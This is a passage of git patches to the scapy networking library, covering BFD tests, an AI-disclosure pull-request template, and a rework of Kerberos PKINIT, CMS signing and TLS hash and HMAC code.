phantom optional_auth (Issue #4937) + +a = UDP(sport=3784, dport=3784)/BFD() +p = UDP(raw(a)) +assert p[BFD].optional_auth is None +assert not p[BFD].flags.A + += BFD with non-Auth flags set - optional_auth should still be None + +a = UDP(sport=3784, dport=3784)/BFD(flags="DF") +p = UDP(raw(a)) +assert p[BFD].flags.D +assert p[BFD].flags.F +assert not p[BFD].flags.A +assert p[BFD].optional_auth is None + += BFD round-trip without auth preserves raw bytes + +a = UDP(sport=3784, dport=3784)/BFD() +raw1 = raw(a) +raw2 = raw(UDP(raw1)) +assert raw1 == raw2 + += BFD with Auth flag set - optional_auth should be present + +p = UDP(b'\x04\x00\x0e\xc8\x00\x29\x72\x31\x20\x44\x05\x21\x00\x00\x00\x01\x00\x00\x00\x00\x00\x0f\x42\x40\x00\x0f\x42\x40\x00\x00\x00\x00\x01\x09\x02\x73\x65\x63\x72\x65\x74\x4e\x0a\x90\x40') +assert p[BFD].flags.A +assert p[BFD].optional_auth is not None +assert isinstance(p[BFD].optional_auth, OptionalAuth) \ No newline at end of file From 50092339d2f3fe6b69252ddac3c91381570160f6 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Mon, 13 Apr 2026 22:12:47 +0200 Subject: [PATCH 1623/1632] NTLM: bad doc (#4966) --- scapy/layers/ntlm.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index fbba9a24e94..77f466d0a27 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -2132,7 +2132,7 @@ class NTLMSSP_DOMAIN(NTLMSSP): :param HASHNT: the HASHNT of the machine account (use Netlogon secure channel). :param ssp: a KerberosSSP to use (use Kerberos secure channel). :param PASSWORD: the PASSWORD of the machine account to use for Netlogon. - :param DC_IP: (optional) specify the IP of the DC. + :param DC_FQDN: (optional) specify the FQDN of the DC. Netlogon example:: From f6793df9d4165cd63ab4060e63a89b2a60e2a426 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sun, 19 Apr 2026 12:16:21 +0200 Subject: [PATCH 1624/1632] Users should disclose the use of AI (#4968) --- .github/PULL_REQUEST_TEMPLATE.md | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md index a7340ee6c6b..51acbea8a29 100644 --- a/.github/PULL_REQUEST_TEMPLATE.md +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -1,12 +1,20 @@ - + -**Checklist:** +**Checklist :** - [ ] If you are new to Scapy: I have checked [CONTRIBUTING.md](https://github.com/secdev/scapy/blob/master/CONTRIBUTING.md) (esp. section submitting-pull-requests) - [ ] I squashed commits belonging together - [ ] I added unit tests or explained why they are not relevant - [ ] I executed the regression tests (using `tox`) - [ ] If the PR is still not finished, please create a [Draft Pull Request](https://github.blog/2019-02-14-introducing-draft-pull-requests/) +- [ ] This PR uses (partially) AI-generated code. If so: + - [ ] I ensured the generated code follows the internal concepts of scapy + - [ ] This PR has a test coverage > 90% + - [ ] I reviewed every generated line + - [ ] If this PR contains more than 500 lines of code (excluding unit tests) I considered splitting this PR. + - [ ] I considered interoperability tests with existing packages or utilities to ensure conformity of a newly generated protocol + +**I understand that failing to mention the use of AI may result in a ban. (We do not forbid it, but you must play fair. Be warned !)** From 366530e2a902e509f49fa68b84a7057f9d408732 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Mon, 20 Apr 2026 16:52:12 +0200 Subject: [PATCH 1625/1632] Improve CMS/Kerberos support of other hashes (#4974) --- scapy/asn1/mib.py | 1 + scapy/layers/gssapi.py | 2 +- scapy/layers/kerberos.py | 179 ++++++++++++++++++++++-------- scapy/layers/tls/cert.py | 127 ++++++++++++++++----- scapy/layers/tls/crypto/h_mac.py | 41 +++---- scapy/layers/tls/crypto/hash.py | 76 +++++++++++-- scapy/layers/tls/crypto/hkdf.py | 2 +- scapy/layers/tls/crypto/pkcs1.py | 26 +---- scapy/layers/tls/crypto/prf.py | 28 ++--- scapy/layers/tls/crypto/suites.py | 6 +- scapy/layers/windows/erref.py | 3 +- scapy/layers/windows/registry.py | 9 +- scapy/modules/ticketer.py | 2 +- test/scapy/layers/tls/tls.uts | 33 +++--- 14 files changed, 367 insertions(+), 168 deletions(-) diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 7bb30811e00..b164fcc9c44 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -807,6 +807,7 @@ def load_mib(filenames): # of some algorithms from pkcs1_oids and x962Signature_oids. hash_by_oid = { + "1.2.840.113549.1.1.1": "sha1", "1.2.840.113549.1.1.2": "md2", "1.2.840.113549.1.1.3": "md4", "1.2.840.113549.1.1.4": "md5", diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 6f4d5e91343..5e1732ab078 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -342,7 +342,7 @@ def fromssl( log_runtime.warning("Failed to parse the SSL Certificate. CBT not used") return GSS_C_NO_CHANNEL_BINDINGS try: - h = cert.getSignatureHash() + h = cert.getCertSignatureHash() except Exception: # We failed to get the signature algorithm. log_runtime.warning( diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 0540d17e3d4..f8e18ce64c2 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -269,15 +269,21 @@ def toString(self): return "/".join(x.val.decode() for x in self.nameString) @staticmethod - def fromUPN(upn: str): + def fromUPN(upn: str, canonicalize: bool = False): """ Create a PrincipalName from a UPN string. """ - user, _ = _parse_upn(upn) - return PrincipalName( - nameString=[ASN1_GENERAL_STRING(user)], - nameType=ASN1_INTEGER(1), # NT-PRINCIPAL - ) + if canonicalize: + return PrincipalName( + nameString=[ASN1_GENERAL_STRING(upn)], + nameType=ASN1_INTEGER(10), # NT-ENTERPRISE + ) + else: + user, _ = _parse_upn(upn) + return PrincipalName( + nameString=[ASN1_GENERAL_STRING(user)], + nameType=ASN1_INTEGER(1), # NT-PRINCIPAL + ) @staticmethod def fromSPN(spn: str): @@ -728,6 +734,7 @@ class AD_AND_OR(ASN1_Packet): 15: "PA-PK-AS-REP-OLD", 16: "PA-PK-AS-REQ", 17: "PA-PK-AS-REP", + 18: "PA-PK-OCSP-RESPONSE", 19: "PA-ETYPE-INFO2", 20: "PA-SVR-REFERRAL-INFO", 111: "TD-CMS-DIGEST-ALGORITHMS", @@ -1381,20 +1388,21 @@ class KRB_PKAuthenticator(ASN1_Packet): ), # [MS-PKCA] sect 2.2.3 ASN1F_optional( - ASN1F_PACKET("paChecksum2", PAChecksum2(), PAChecksum2, explicit_tag=0xA5), + ASN1F_PACKET("paChecksum2", None, PAChecksum2, explicit_tag=0xA5), ), ) - def make_checksum(self, text, h="sha256"): + def make_checksum(self, text, h: str = "sha256"): """ - Populate paChecksum and paChecksum2 + Populate paChecksum """ # paChecksum (always sha-1) self.paChecksum = ASN1_STRING(Hash_SHA().digest(text)) # paChecksum2 - self.paChecksum2 = PAChecksum2() - self.paChecksum2.make(text, h=h) + if h != "sha1": + self.paChecksum2 = PAChecksum2() + self.paChecksum2.make(text, h=h) def verify_checksum(self, text): """ @@ -1403,7 +1411,8 @@ def verify_checksum(self, text): if self.paChecksum.val != Hash_SHA().digest(text): raise ValueError("Bad paChecksum checksum !") - self.paChecksum2.verify(text) + if self.paChecksum2 is not None: + self.paChecksum2.verify(text) # RFC8636 sect 6 @@ -2118,11 +2127,12 @@ def m2i(self, pkt, s): val = super(_KRBERROR_data_Field, self).m2i(pkt, s) if not val[0].val: return val - if pkt.errorCode.val in [14, 24, 25, 36]: + if pkt.errorCode.val in [14, 24, 25, 36, 80]: # 14: KDC_ERR_ETYPE_NOSUPP # 24: KDC_ERR_PREAUTH_FAILED # 25: KDC_ERR_PREAUTH_REQUIRED # 36: KRB_AP_ERR_BADMATCH + # 80: KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED return MethodData(val[0].val, _underlayer=pkt), val[1] elif pkt.errorCode.val in [6, 7, 12, 13, 18, 29, 32, 41, 60, 62]: # 6: KDC_ERR_C_PRINCIPAL_UNKNOWN @@ -2993,6 +3003,7 @@ class KerberosClient(Automaton): :param mode: the mode to use for the client (default: AS_REQ). :param ip: the IP of the DC (default: discovered by dclocator) :param upn: the UPN of the client. + :param canonicalize: request the UPN to be canonicalized. :param password: the password of the client. :param key: the Key of the client (instead of the password) :param realm: the realm of the domain. (default: from the UPN) @@ -3009,6 +3020,8 @@ class KerberosClient(Automaton): :param armor_ticket_upn: the UPN of the client of the armoring ticket :param armor_ticket_skey: the session Key object of the armoring ticket :param etypes: specify the list of encryption types to support + :param dhashes: specify the list of supported digest algorithms for PKINIT + (defaults to ["sha1", "sha256", "sha384", "sha512"]) AS-REQ only: @@ -3048,12 +3061,14 @@ def __init__( mode=MODE.AS_REQ, ip: Optional[str] = None, upn: Optional[str] = None, + canonicalize: bool = False, password: Optional[str] = None, key: Optional["Key"] = None, realm: Optional[str] = None, x509: Optional[Union[Cert, str]] = None, x509key: Optional[Union[PrivKey, str]] = None, ca: Optional[Union[CertTree, str]] = None, + no_verify_cert: bool = False, p12: Optional[str] = None, spn: Optional[str] = None, ticket: Optional[KRB_Ticket] = None, @@ -3072,6 +3087,7 @@ def __init__( armor_ticket_skey: Optional["Key"] = None, key_list_req: List["EncryptionType"] = [], etypes: Optional[List["EncryptionType"]] = None, + dhashes: Optional[List[str]] = None, pkinit_kex_method: PKINIT_KEX_METHOD = PKINIT_KEX_METHOD.DIFFIE_HELLMAN, port: int = 88, timeout: int = 5, @@ -3081,22 +3097,6 @@ def __init__( import scapy.libs.rfc3961 # Trigger error if any # noqa: F401 from scapy.layers.ldap import dclocator - if not upn: - raise ValueError("Invalid upn") - if not spn: - raise ValueError("Invalid spn") - if realm is None: - if mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: - _, realm = _parse_upn(upn) - elif mode == self.MODE.TGS_REQ: - _, realm = _parse_spn(spn) - if not realm and ticket: - # if no realm is specified, but there's a ticket, take the realm - # of the ticket. - realm = ticket.realm.val.decode() - else: - raise ValueError("Invalid realm") - # PKINIT checks if p12 is not None: # password should be None or bytes @@ -3137,12 +3137,58 @@ def __init__( x509key = PrivKey(x509key) if ca and not isinstance(ca, CertList): ca = CertList(ca) + if upn is None and x509: + # For PKINIT, get the UPN from the SAN, if possible and present + if realm is None: + raise ValueError( + "When using PKINIT, you must at least specify the realm= !" + ) + for ext in x509.extensions: + if ext.extnID.val == "2.5.29.17": # subjectAltName + generalName = ext.extnValue.subjectAltName[0].generalName + upn = generalName.value.val.decode("utf-8") + break + if upn is None: + raise ValueError( + "Could not find subjectAltName in certificate !" + " Please provide a UPN." + ) + canonicalize = True + + # UPN, SPN and realm calculation + if not upn: + raise ValueError("Invalid upn") + if realm is None: + if mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: + _, realm = _parse_upn(upn) + elif mode == self.MODE.TGS_REQ: + _, realm = _parse_spn(spn) + if not realm and ticket: + # if no realm is specified, but there's a ticket, take the realm + # of the ticket. + realm = ticket.realm.val.decode() + else: + raise ValueError("Invalid realm") + if not spn and mode == self.MODE.AS_REQ and realm: + spn = "krbtgt/" + realm + elif not spn: + raise ValueError("Invalid spn") + # Extra checks for specific requests if mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: if not host: raise ValueError("Invalid host") - if x509 is not None and (not x509key or not ca): - raise ValueError("Must provide both 'x509', 'x509key' and 'ca' !") + if x509 is not None: + if x509key and not ca: + if not no_verify_cert: + raise ValueError( + "Using PKINIT without specifying the remote CA is unsafe !" + " Set no_verify_cert=True to bypass this check." + ) + else: + ca = [] + elif not x509key or not ca: + raise ValueError("Must provide both 'x509', 'x509key' and 'ca' !") elif mode == self.MODE.TGS_REQ: if not ticket: raise ValueError("Invalid ticket") @@ -3174,6 +3220,8 @@ def __init__( "Cannot specify armor_ticket without armor_ticket_{upn,skey}" ) + # Provide default supported encryption types. For SALT mode, we discard + # the encryption types that don't have a salt. if mode == self.MODE.GET_SALT: if etypes is not None: raise ValueError("Cannot specify etypes in GET_SALT mode !") @@ -3187,7 +3235,6 @@ def __init__( EncryptionType.AES256_CTS_HMAC_SHA1_96, EncryptionType.AES128_CTS_HMAC_SHA1_96, EncryptionType.RC4_HMAC, - EncryptionType.RC4_HMAC_EXP, EncryptionType.DES_CBC_MD5, ] self.etypes = etypes @@ -3208,6 +3255,7 @@ def __init__( self.password = password and bytes_encode(password) self.spn = spn self.upn = upn + self.canonicalize = canonicalize # Whether we request canonicalization self.realm = realm.upper() self.x509 = x509 self.x509key = x509key @@ -3233,7 +3281,12 @@ def __init__( # This marks that we sent a FAST-req and are awaiting for an answer self.fast_req_sent = False # Session parameters - self.pre_auth = False + if self.x509: + # Windows only assumes it needs a pre-auth when PKINIT is used, + # otherwise it waits to have a PREAUTH_REQUIRED error first. + self.pre_auth = True + else: + self.pre_auth = False self.pa_type = None # preauth-type that's used self.fast_rep = None self.fast_error = None @@ -3241,11 +3294,17 @@ def __init__( self.fast_armorkey = None # The armor key self.fxcookie = None self.pkinit_dh_key = None + self.no_verify_cert = no_verify_cert if ca is not None: self.pkinit_cms = CMS_Engine(ca) else: self.pkinit_cms = None + if dhashes is None: + self.dhashes = ["sha1", "sha256", "sha384", "sha512"] + else: + self.dhashes = dhashes + # Launch the client sock = self._connect() super(KerberosClient, self).__init__( sock=sock, @@ -3455,7 +3514,8 @@ def as_req(self): address=ASN1_STRING(self.host.ljust(16, " ")), ) ] - kdc_req.cname = PrincipalName.fromUPN(self.upn) + kdc_req.addresses = None + kdc_req.cname = PrincipalName.fromUPN(self.upn, canonicalize=self.canonicalize) kdc_req.sname = PrincipalName.fromSPN(self.spn) # 2. Build the list of PADATA @@ -3507,7 +3567,7 @@ def as_req(self): nonce=ASN1_INTEGER(RandNum(0, 0x7FFFFFFF)._fix()), ), clientPublicValue=None, # Used only in DH mode - supportedCMSTypes=None, + supportedCMSTypes=[], clientDHNonce=None, supportedKDFs=None, ) @@ -3515,7 +3575,7 @@ def as_req(self): if self.pkinit_kex_method == PKINIT_KEX_METHOD.DIFFIE_HELLMAN: # RFC4556 - 3.2.3.1. Diffie-Hellman Key Exchange - # We use modp2048 + # We (and Windows) use modp2048 dh_parameters = _ffdh_groups["modp2048"][0] self.pkinit_dh_key = dh_parameters.generate_private_key() numbers = dh_parameters.parameter_numbers() @@ -3530,6 +3590,7 @@ def as_req(self): g=ASN1_INTEGER(numbers.g), # q: see ERRATA 1 of RFC4556 q=ASN1_INTEGER(numbers.q or (numbers.p - 1) // 2), + j=None, ), ), subjectPublicKey=DHPublicKey( @@ -3565,8 +3626,15 @@ def as_req(self): else: raise ValueError - # Populate paChecksum and PAChecksum2 - authpack.pkAuthenticator.make_checksum(bytes(kdc_req)) + # Find a supported digest hash. Windows 25H2 still defaults + # to SHA1 unless a client policy has been applied. + dhash = next(iter(self.dhashes)) + + # Populate paChecksum + authpack.pkAuthenticator.make_checksum( + bytes(kdc_req), + h=dhash, + ) # Sign the AuthPack signedAuthpack = self.pkinit_cms.sign( @@ -3574,6 +3642,7 @@ def as_req(self): ASN1_OID("id-pkinit-authData"), self.x509, self.x509key, + dhash=dhash, ) # Build PA-DATA @@ -3586,6 +3655,14 @@ def as_req(self): kdcPkId=None, ), ) + + # RFC 4557 extension - OCSP + padata.insert( + 0, + PADATA( + padataType=18, # PA-PK-OCSP-RESPONSE + ), + ) else: # Key-based factor @@ -3784,7 +3861,7 @@ def tgs_req(self): _, crealm = _parse_upn(self.upn) authenticator = KRB_Authenticator( crealm=ASN1_GENERAL_STRING(crealm), - cname=PrincipalName.fromUPN(self.upn), + cname=PrincipalName.fromUPN(self.upn, canonicalize=self.canonicalize), cksum=None, ctime=ASN1_GENERALIZED_TIME(now_time), cusec=ASN1_INTEGER(0), @@ -3899,6 +3976,7 @@ def _process_padatas_and_key(self, padatas, etype: "EncryptionType" = None): keyinfo = self.pkinit_cms.verify( padata.padataValue.rep.dhSignedData, eContentType=ASN1_OID("id-pkinit-DHKeyData"), + no_verify_cert=self.no_verify_cert, ) # If 'etype' is None, we're in an error. Since we verified @@ -3925,6 +4003,9 @@ def _process_padatas_and_key(self, padatas, etype: "EncryptionType" = None): else: raise ValueError + elif padata.padataType == 111: # TD-CMS-DIGEST-ALGORITHMS + self.dhashes = [x.algorithm.oidname for x in padata.padataValue.seq] + elif padata.padataType == 133: # PA-FX-COOKIE # Get cookie and store it self.fxcookie = padata.padataValue @@ -4021,7 +4102,7 @@ def receive_krb_error_as_req(self, pkt): return if pkt.root.errorCode == 25: # KDC_ERR_PREAUTH_REQUIRED - if not self.key and not self.x509: + if not self.key: log_runtime.error( "Got 'KDC_ERR_PREAUTH_REQUIRED', " "but no possible key could be computed." @@ -4030,6 +4111,9 @@ def receive_krb_error_as_req(self, pkt): self.should_followup = True self.pre_auth = True raise self.BEGIN() + elif pkt.root.errorCode == 80: # KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED + self.should_followup = True + raise self.BEGIN() else: self._show_krb_error(pkt) raise self.FINAL() @@ -4068,6 +4152,11 @@ def decrypt_as_rep(self, pkt): self.fast_armorkey, bytes(pkt.root.ticket), ) + # Process pa of FAST response + self._process_padatas_and_key( + self.fast_rep.padata, + etype=pkt.root.encPart.etype.val, + ) self.fast_rep = None elif self.fast: raise ValueError("Answer was not FAST ! Is it supported?") @@ -4204,7 +4293,7 @@ def _spn_are_equal(spn1, spn2): def krb_as_req( - upn: str, + upn: Optional[str] = None, spn: Optional[str] = None, ip: Optional[str] = None, key: Optional["Key"] = None, @@ -4248,12 +4337,10 @@ def krb_as_req( ...: f4e99205e78f8da7681d4ec5520ae4815543720c2a647c1ae814c9")) >>> krb_as_req("user1@DOMAIN.LOCAL", ip="192.168.122.17", key=key) - Example using PKINIT with a p12:: + Example using PKINIT with a p12 ("password" is the password of the p12):: - >>> krb_as_req("user1@DOMAIN.LOCAL", p12="./store.p12", password="password") + >>> krb_as_req(p12="./store.p12", realm="DOMAIN.LOCAL", password="password") """ - if realm is None: - _, realm = _parse_upn(upn) if key is None and p12 is None and x509 is None: if password is None: try: @@ -4266,7 +4353,7 @@ def krb_as_req( mode=KerberosClient.MODE.AS_REQ, realm=realm, ip=ip, - spn=spn or "krbtgt/" + realm, + spn=spn, host=host, upn=upn, password=password, diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 7f3e710d806..e41ca71a784 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -135,10 +135,10 @@ X509_CRL, X509_SubjectPublicKeyInfo, ) +from scapy.layers.tls.crypto.hash import _get_hash from scapy.layers.tls.crypto.pkcs1 import ( _DecryptAndSignRSA, _EncryptAndVerifyRSA, - _get_hash, pkcs_os2ip, ) from scapy.compat import bytes_encode @@ -155,7 +155,7 @@ from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives import serialization - from cryptography.hazmat.primitives.asymmetric import rsa, ec, x25519 + from cryptography.hazmat.primitives.asymmetric import rsa, ec, x25519, x448 # cryptography raised the minimum RSA key length to 1024 in 43.0+ # https://github.com/pyca/cryptography/pull/10278 @@ -567,15 +567,6 @@ def __call__(cls, key_path=None, cryptography_obj=None): _an RSAPrivateKey; _an ECDSAPrivateKey. """ - if key_path is None: - obj = type.__call__(cls) - if cls is PrivKey: - cls = PrivKeyECDSA - obj.__class__ = cls - obj.frmt = "original" - obj.fill_and_store() - return obj - # This allows to import cryptography objects directly if cryptography_obj is not None: # We (stupidly) need to go through the whole import process because RSA @@ -588,6 +579,14 @@ def __call__(cls, key_path=None, cryptography_obj=None): encryption_algorithm=serialization.NoEncryption(), ), ) + elif key_path is None: + obj = type.__call__(cls) + if cls is PrivKey: + cls = PrivKeyECDSA + obj.__class__ = cls + obj.frmt = "original" + obj.fill_and_store() + return obj else: # Load from file obj = _PKIObjMaker.__call__(cls, key_path, _MAX_KEY_SIZE) @@ -1029,7 +1028,7 @@ def encrypt(self, msg, t="pkcs", h="sha256", mgf=None, L=None): def verify(self, msg, sig, t="pkcs", h="sha256", mgf=None, L=None): return self.pubkey.verify(msg, sig, t=t, h=h, mgf=mgf, L=L) - def getSignatureHash(self): + def getCertSignatureHash(self): """ Return the hash cryptography object used by the 'signatureAlgorithm' """ @@ -1142,6 +1141,10 @@ def pubKey(self): ) return self.pubkey + @property + def extensions(self): + return self.tbsCertificate.extensions + def __eq__(self, other): return self.der == other.der @@ -1635,7 +1638,7 @@ def _rec_getchain(chain, curtree): for c, subtree in curtree: curchain = chain + [c] # If 'cert' is issued by c - if cert.isIssuer(c): + if cert.isIssuer(c) or c == cert: # Final node of the chain ! # (add the final cert if not self signed) if c != cert: @@ -1650,7 +1653,8 @@ def _rec_getchain(chain, curtree): chain = _rec_getchain([], self.tree) if chain is not None: - return CertTree(chain) + # We add the first certificate to the ROOT in all cases + return CertTree(chain, [chain[0]]) else: return None @@ -1718,13 +1722,75 @@ def __init__( self.store = store self.crls = crls + def _get_algorithms(self, key: PrivKey, h="sha256") -> ASN1_OID: + """ + Get the algorithms matching a private key + """ + if isinstance(key, PrivKeyRSA): + # RFC3370 sect 3.2 + return ( + ASN1_OID("rsaEncryption"), + _get_hash(h), + h, + ) + elif isinstance(key, PrivKeyECDSA): + # RFC5753 sect 2.1.1 + if h == "sha1": + return ( + ASN1_OID("ecdsa-with-SHA1"), + hashes.SHA1(), + "sha1", + ) + elif h == "sha224": + return ( + ASN1_OID("ecdsa-with-SHA224"), + hashes.SHA224(), + "sha224", + ) + elif h == "sha256": + return ( + ASN1_OID("ecdsa-with-SHA256"), + hashes.SHA256(), + "sha256", + ) + elif h == "sha384": + return ( + ASN1_OID("ecdsa-with-SHA384"), + hashes.SHA384(), + "sha384", + ) + elif h == "sha512": + return ( + ASN1_OID("ecdsa-with-SHA512"), + hashes.SHA512(), + "sha512", + ) + else: + raise ValueError("Unknown hash for private key !") + elif isinstance(key, PrivKeyEdDSA): + # RFC8419 sect 2.3 + if isinstance(key.key, x25519.X25519PrivateKey): + return ( + ASN1_OID("Ed25519"), + hashes.SHA512(), + "sha512", + ) + elif isinstance(key.key, x448.X448PrivateKey): + return ( + ASN1_OID("Ed448"), + hashes.SHAKE256(64), + "shake256", + ) + else: + raise ValueError("Unknown private key type !") + def sign( self, message: Union[bytes, Packet], eContentType: ASN1_OID, cert: Cert, key: PrivKey, - h: Optional[str] = None, + dhash: Optional[str] = "sha256", ): """ Sign a message using CMS. @@ -1733,17 +1799,18 @@ def sign( :param eContentType: the OID of the inner content. :param cert: the certificate whose key to use use for signing. :param key: the private key to use for signing. - :param h: the hash to use (default: same as the certificate's signature) + :param dhash: the hash to use for message digest (ECDSA only). We currently only support X.509 certificates ! """ - # RFC3852 - 5.4. Message Digest Calculation Process - h = h or _get_cert_sig_hashname(cert) - hash = hashes.Hash(_get_hash(h)) + sigalg, cdhash, dhash = self._get_algorithms(key, h=dhash) + + # RFC3852 5.4. Message Digest Calculation Process + hash = hashes.Hash(cdhash) hash.update(bytes(message)) hashed_message = hash.finalize() - # 5.5. Signature Generation Process + # RFC3852 5.5. Signature Generation Process signerInfo = CMS_SignerInfo( version=1, sid=CMS_IssuerAndSerialNumber( @@ -1751,7 +1818,7 @@ def sign( serialNumber=cert.tbsCertificate.serialNumber, ), digestAlgorithm=X509_AlgorithmIdentifier( - algorithm=ASN1_OID(h), + algorithm=ASN1_OID(dhash), parameters=ASN1_NULL(0), ), signedAttrs=[ @@ -1769,7 +1836,10 @@ def sign( ], ), ], - signatureAlgorithm=cert.tbsCertificate.signature, + signatureAlgorithm=X509_AlgorithmIdentifier( + algorithm=sigalg, + parameters=ASN1_NULL(0), + ), ) signerInfo.signature = ASN1_STRING( key.sign( @@ -1778,7 +1848,7 @@ def sign( signedAttrs=signerInfo.signedAttrs, ) ), - h=h, + h=dhash, ) ) @@ -1792,7 +1862,7 @@ def sign( content=CMS_SignedData( version=3 if certificates else 1, digestAlgorithms=X509_AlgorithmIdentifier( - algorithm=ASN1_OID(h), + algorithm=ASN1_OID(dhash), parameters=ASN1_NULL(0), ), encapContentInfo=CMS_EncapsulatedContentInfo( @@ -1820,6 +1890,7 @@ def verify( contentInfo: CMS_ContentInfo, eContentType: Optional[ASN1_OID] = None, eContent: Optional[bytes] = None, + no_verify_cert: bool = False, ): """ Verify a CMS message against the list of trusted certificates, @@ -1828,6 +1899,7 @@ def verify( :param contentInfo: the ContentInfo whose signature to verify :param eContentType: if provided, verifies that the content type is valid :param eContent: in PKCS 7.1, provide the content to verify + :param no_verify_cert: do not check the remote certificate (unsafe) """ if contentInfo.contentType.oidname != "id-signedData": raise ValueError("ContentInfo isn't signed !") @@ -1846,11 +1918,14 @@ def verify( # Check all signatures for signerInfo in signeddata.signerInfos: + sigh = hash_by_oid[signerInfo.signatureAlgorithm.algorithm.val] + # Find certificate in the chain that did this cert: Cert = certTree.findCertBySid(signerInfo.sid) # Verify certificate signature - certTree.verify(cert) + if not no_verify_cert: + certTree.verify(cert) # Verify the message hash if signerInfo.signedAttrs: @@ -1911,11 +1986,13 @@ def verify( ) ), sig=signerInfo.signature.val, + h=sigh, ) else: cert.verify( msg=bytes(signeddata.encapContentInfo), sig=signerInfo.signature.val, + h=sigh, ) # Return the content diff --git a/scapy/layers/tls/crypto/h_mac.py b/scapy/layers/tls/crypto/h_mac.py index 26c69ebfbe0..db984dc22a2 100644 --- a/scapy/layers/tls/crypto/h_mac.py +++ b/scapy/layers/tls/crypto/h_mac.py @@ -8,10 +8,12 @@ HMAC classes. """ -import hmac - +from scapy.config import conf from scapy.layers.tls.crypto.hash import _tls_hash_algs -from scapy.compat import bytes_encode + +if conf.crypto_valid: + from cryptography.hazmat.backends import default_backend + from cryptography.hazmat.primitives.hmac import HMAC _SSLv3_PAD1_MD5 = b"\x36" * 48 _SSLv3_PAD1_SHA1 = b"\x36" * 40 @@ -30,15 +32,18 @@ class _GenericHMACMetaclass(type): the associated hash function (see RFC 5246, appendix C). Also, we do not need to instantiate the associated hash function. """ + def __new__(cls, hmac_name, bases, dct): - hash_name = hmac_name[5:] # remove leading "Hmac_" + hash_name = hmac_name[5:] # remove leading "Hmac_" if hmac_name != "_GenericHMAC": + hash_alg = _tls_hash_algs[hash_name.lower()] dct["name"] = "HMAC-%s" % hash_name - dct["hash_alg"] = _tls_hash_algs[hash_name] - dct["hmac_len"] = _tls_hash_algs[hash_name].hash_len + dct["hash_alg"] = hash_alg + dct["hmac_len"] = hash_alg.hash_len dct["key_len"] = dct["hmac_len"] - the_class = super(_GenericHMACMetaclass, cls).__new__(cls, hmac_name, - bases, dct) + the_class = super(_GenericHMACMetaclass, cls).__new__( + cls, hmac_name, bases, dct + ) if hmac_name != "_GenericHMAC": _tls_hmac_algs[dct["name"]] = the_class return the_class @@ -48,38 +53,36 @@ class HMACError(Exception): """ Raised when HMAC verification fails. """ + pass class _GenericHMAC(metaclass=_GenericHMACMetaclass): def __init__(self, key=None): - if key is None: - self.key = b"" - else: - self.key = bytes_encode(key) + self.key = key or b"" def digest(self, tbd): if self.key is None: raise HMACError - tbd = bytes_encode(tbd) - return hmac.new(self.key, tbd, self.hash_alg.hash_cls).digest() + hm = HMAC(self.key, self.hash_alg.hash_cls(), backend=default_backend()) + hm.update(tbd) + return hm.finalize() def digest_sslv3(self, tbd): if self.key is None: raise HMACError h = self.hash_alg() - if h.name == "SHA": + if h.name == "sha": pad1 = _SSLv3_PAD1_SHA1 pad2 = _SSLv3_PAD2_SHA1 - elif h.name == "MD5": + elif h.name == "md5": pad1 = _SSLv3_PAD1_MD5 pad2 = _SSLv3_PAD2_MD5 else: raise HMACError("Provided hash does not work with SSLv3.") - return h.digest(self.key + pad2 + - h.digest(self.key + pad1 + tbd)) + return h.digest(self.key + pad2 + h.digest(self.key + pad1 + tbd)) class Hmac_NULL(_GenericHMAC): @@ -125,4 +128,4 @@ def Hmac(key, hashtype): """ Return Hmac object from Hash object and key """ - return _tls_hmac_algs[f"HMAC-{hashtype.name}"](key=key) + return _tls_hmac_algs[f"HMAC-{hashtype.name.upper()}"](key=key) diff --git a/scapy/layers/tls/crypto/hash.py b/scapy/layers/tls/crypto/hash.py index b1bcdbe2669..cb54b127cdc 100644 --- a/scapy/layers/tls/crypto/hash.py +++ b/scapy/layers/tls/crypto/hash.py @@ -8,9 +8,13 @@ Hash classes. """ -from hashlib import md5, sha1, sha224, sha256, sha384, sha512 +from scapy.config import conf, crypto_validator from scapy.layers.tls.crypto.md4 import MD4 as md4 +if conf.crypto_valid: + from cryptography.hazmat.backends import default_backend + from cryptography.hazmat.primitives import hashes + from cryptography.hazmat.primitives.hashes import HashAlgorithm _tls_hash_algs = {} @@ -20,19 +24,23 @@ class _GenericHashMetaclass(type): Hash classes are automatically registered through this metaclass. Furthermore, their name attribute is extracted from their class name. """ + def __new__(cls, hash_name, bases, dct): if hash_name != "_GenericHash": - dct["name"] = hash_name[5:] # remove leading "Hash_" - the_class = super(_GenericHashMetaclass, cls).__new__(cls, hash_name, - bases, dct) + dct["name"] = hash_name[5:].lower() # remove leading "Hash_" + the_class = super(_GenericHashMetaclass, cls).__new__( + cls, hash_name, bases, dct + ) if hash_name != "_GenericHash": - _tls_hash_algs[hash_name[5:]] = the_class + _tls_hash_algs[dct["name"]] = the_class return the_class class _GenericHash(metaclass=_GenericHashMetaclass): def digest(self, tbd): - return self.hash_cls(tbd).digest() + digest = 